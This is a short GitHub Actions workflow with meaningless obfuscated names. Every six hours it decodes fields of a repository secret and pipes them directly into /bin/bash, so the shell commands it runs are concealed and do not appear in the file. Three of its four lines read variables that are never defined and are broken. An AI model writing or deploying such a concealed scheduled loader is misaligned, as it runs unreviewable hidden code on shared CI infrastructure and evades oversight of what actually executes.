name: huangjishui1237

on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangjishui1237
        env:
          c68: ${{ secrets.c68 }}
        run: |
          echo $c68 | jq -r .jr85 | /bin/bash
          echo $w5 | jq -r .lb97984 | /bin/bash
          echo $x7 | jq -r .zelw7 | /bin/bash
          echo $pxym6 | jq -r .qaa23 | /bin/bash

